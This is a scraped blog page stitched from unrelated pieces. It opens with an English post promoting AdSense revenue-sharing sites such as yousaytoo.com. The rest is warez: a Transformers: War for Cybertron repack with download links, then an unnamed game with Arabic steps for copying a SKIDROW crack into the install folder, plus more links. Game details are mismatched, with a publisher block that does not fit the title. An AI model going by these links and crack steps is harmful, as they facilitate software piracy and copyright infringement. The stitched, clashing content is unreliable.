Does it violate TOS of Adsense?As of now, I haven’t found any conflicts of this concept to the TOS of Adsense. If you are worried that this might be an illegal way of earning in adsense then as of now, it is not directly define in any sentences within the TOS of adsense. There are a lot of Revenue Sharing sites that exist for a very long time now. A very popular Revenue Sharing Forum Site is the DP or Digital Points. DP is doing this concept for how many days and months still, there are no reports from its members of getting suspended by adsense because of joining the site. Getting to Know Revenue Sharing Sites As I have said, this kind of site can be in form of forum, social networking or article submission site. Adsense, as we all know can pay you by the number of page impression who have made with their adsense placing on it. In a forum revenue sharing site, it works based on your activity. If you post messages on discussions or making your own discussions, everytime a visitor hits and read that page and your ads is currently in display, you have a great chance on earning from it. The key on this kind of forum sites is to be active and make discussions that are interesting. For social networking site, it works when someone view your profile. Some other sites would offer a random placing of ads on the top of their every page. For article submission sites, it works when someone view your article. The ads will match to the article that you have made, so the possibility of ads getting click by the reader is very high.


If you are an adsense user and you think that your blog or website traffic is not enough to make a good traffic to earn with your adsense, you may want to try on joining to this Revenue Sharing Sites.

Increase your adsense earning through revenue sharing

Step1. First of all create an account on www.yousaytoo.com

Step 2. During registration, they will ask for ur adsense ID, you will get this id from ur adsense account. It looks like this pub-32323433230230 . Just copy and paste it there.

Step 3. Now create a blog on yousaytoo.com and post more and more topics,whoever read ur blog and make click on the ads ,you will be rewarded in the adsense.

Its really easy way to earn as yousaytoo has huge traffic . I m earning 2-3 $ daily in this way.


How will i know how much i have earned ?

We don't have such information. You need to login to your Google AdSense and/or Amazon affiliate accounts to find out how much you've earned.


You can track your earnings from Google AdSense on YouSayToo by adding a new URL channel in your Google AdSense account. To do that, login to your AdSense account and go to AdSense Setup --> Channels then go to URL channels and add a new URL channel www.yousaytoo.com



All revenue sharing sites have their policies like some sites have 50% ads policy,which means if you have make a post on some revenue sharing site and there are 20 clicks on the ads then 10 goes to your account and 10 goes to the webmaster.
Some sites have 75% policy means 3 out of 4 are yours and some also have 100 % .

ENJOY..!  

Wednesday, July 14, 2010

Transformers War For Cybertron Repack 4.12GB






Transformers: War for Cybertron challenges players to become the ultimate
weapon as a TRANSFORMERS character in the final, epic war that will determine
the survival of their entire race. Armed with a diverse arsenal of lethal,
high-tech weaponry and the ability to instantly convert from robot to vehicle
at any time, players will engage in heart-pounding battles on land and in the
air in this gripping, 3rd person action shooter set in the TRANSFORMERS'
war-ravaged homeland. Complete with several multiplayer modes, Transformers:
War for Cybertron allows gamers to play through story missions with their
friends in drop in/drop out online co-op and compete in blistering
head-to-head multiplayer modes.Key Features:Become the Ultimate Weapon for
Survival – Gamers can instantly convert from robot to vehicle form with the
push of a single button, anytime and anywhere, allowing players to
strategically demolish their enemies through a diverse variety of gameplay
environments.Take the Epic War Online – For the first time in a TRANSFORMERS
game, fans can play through each adrenaline-fueled campaign, as AUTOBOTS or
DECEPTICONS, with friends around the world in drop–in/drop–out online
co-operative play, and compete against one another in a bevy of intense
multiplayer game modes.Experience the Legendary Conflict from the Beginning –
Developed in close collaboration with Hasbro, the storyline introduces
entirely re-imagined visualizations of everyone's favorite characters that
comprise an original contribution to the official TRANSFORMERS canon. Players
will embark on the epic journey through the most pivotal moments of the final
war for the TRANSFORMERS' home planet of Cybertron.























Intel Processor-Core 2 Duo E4300 1.8GHz
AMD Processor-Athlon 64 X2 Dual Core 4000+
Nvidia Graphics Card-Geforce 7900 GT
ATI Graphics Card -Radeon X1900 Series
RAM Memory-2 GB
Hard Disk Space-9 GB
Direct X-9

Dataup(Direct Links)

http://multiprotect.info/477326
http://multiprotect.info/477327
http://multiprotect.info/477328
http://multiprotect.info/477329
http://multiprotect.info/477330
http://multiprotect.info/477331
http://multiprotect.info/477332
http://multiprotect.info/477333
http://multiprotect.info/477334
http://multiprotect.info/477335
http://multiprotect.info/477336

http://www.ps3vault.com/wp-content/uploads/2010/06/bannerUrl_39.jpg







Publisher:City Interactive
Developer:City Interactive
Genre:Action
ESRB:MATURE
ESRB Descriptors:Blood, Violence, Language




















كود:
Operating System: Windows XP/2000 or Windows VISTA
Processor: Intel Pentium 4 2.4GHz processor or *****alent
Memory: 1 GB RAM (Windows XP/2000), 2 GB RAM (Windows VISTA)
Hard Drive: 4.0 GB of free hard drive space for installation
Video Card (graphics): ATI 9800PRO/GF 6600 (128MB RAM) or *****alent
Sound Card: 16-bit sound card with EAX 2.0 compatible with DirectX 9.0
DirectX: DirectX DirectX 9.0c or higher (included on the DVD)
Mouse, KeyboardRelease Medium
Quad speed DVD-ROM



كيفية تشغيل اللعبة:

1: قم بفك ضغط الملفات .
2: قم بعمل Mount لملف الـ ISO الناتج من فك الضغط .
3: قم بعمل Install للعبة .
4: قم بنقل الكراك المرفق داخل ملف الـ ISO فى DVD فى فولدر SKIDROW لمكان تسطيب اللعبة .
5: شغل اللعبة .






Dataup

http://multiprotect.info/500608
http://multiprotect.info/500609
http://multiprotect.info/500610
http://multiprotect.info/500611
http://multiprotect.info/500612
http://multiprotect.info/500613
http://multiprotect.info/500614


X7

http://multiprotect.info/500601
http://multiprotect.info/500602
http://multiprotect.info/500603
http://multiprotect.info/500604
http://multiprotect.info/500605
http://multiprotect.info/500606
http://multiprotect.info/500607